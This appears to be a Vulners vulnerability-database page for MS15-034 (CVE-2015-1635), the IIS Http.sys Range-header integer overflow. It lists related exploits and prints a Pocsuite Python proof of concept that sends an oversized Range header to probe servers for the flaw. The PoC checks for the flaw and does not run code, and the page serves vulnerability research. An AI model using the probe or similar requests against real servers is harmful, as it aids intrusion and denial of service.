Vulners
Lucene search
IIS 系列 Http.sys 处理 Range 整数溢出漏洞
| Reporter | Title | Published | Views | Family All 40 |
|---|---|---|---|---|
 | Microsoft Window - HTTP.sys PoC (MS15-034) | 15 Apr 201500:00 | – | zdt |
| Microsoft Window (HTTP.sys) HTTP Request Parsing DoS (MS15-034) | 17 Apr 201500:00 | – | zdt |
| MS15-034 Microsoft IIS Remote Code Execution Exploit | 19 Apr 201500:00 | – | zdt |
 | Exploit for Code Injection in Microsoft | 20 Oct 202511:22 | – | githubexploit |
| Exploit for Code Injection in Microsoft | 20 Jun 201814:28 | – | githubexploit |
| Exploit for Code Injection in Microsoft | 15 Apr 201515:05 | – | githubexploit |
 | Exploit for Code Injection in Microsoft | 27 Nov 202010:59 | – | gitee |
| Exploit for Code Injection in Microsoft | 25 Nov 202023:04 | – | gitee |
| Exploit for Code Injection in Microsoft | 17 Nov 202009:07 | – | gitee |
 | CVE-2015-1635 | 14 Apr 201500:00 | – | attackerkb |
10
#!/usr/bin/env python
# coding: utf-8
import socket
import random
from urlparse import urljoin
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
from lib.utils.funs import url2ip
class TestPOC(POCBase):
vulID = '89233' # vul ID
version = '1'
author = ['cnyql']
vulDate = '2015-04-14'
createDate = '2015-04-16'
updateDate = '2015-09-19'
references = ['http://www.sebug.net/vuldb/ssvid-89233']
name = 'IIS 系列 Http.sys 处理 Range 整数溢出漏洞'
appPowerLink = 'http://www.iis.net/'
appName = 'Miscrosoft IIS httpd'
appVersion = 'N/A'
vulType = 'Buffer Overflow'
desc = '''
2015年04月14日,微软发布严重级别的安全公告 MS15-034,编号为 CVE-2015-1635,据称在 Http.sys 中的漏洞可能允许远程执行代码。
'''
def _verify(self):
ip = url2ip(self.url)
hexAllFfff = "18446744073709551615"
flag = False
req1 = "GET /HTTP/1.0\r\n\r\n"
req = "GET /HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n"
client_socket =socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ip, 80))
client_socket.send(req1)
boringResp = client_socket.recv(1024)
if "Microsoft" in boringResp:
client_socket.close()
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ip,80))
client_socket.send(req)
goodResp = client_socket.recv(1024)
if "Requested RangeNot Satisfiable" in goodResp:
flag = True
return self.parse_verify(flag)
def parse_verify(self, flag):
output = Output(self)
result = {}
if flag:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = res.url
output.success(result)
else:
output.fail('No vulnerability found.')
return output
def _attack(self):
return self._verify()
register(TestPOC)
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2015 00:00Current
9.2High risk
Vulners AI Score9.2
EPSS0.9431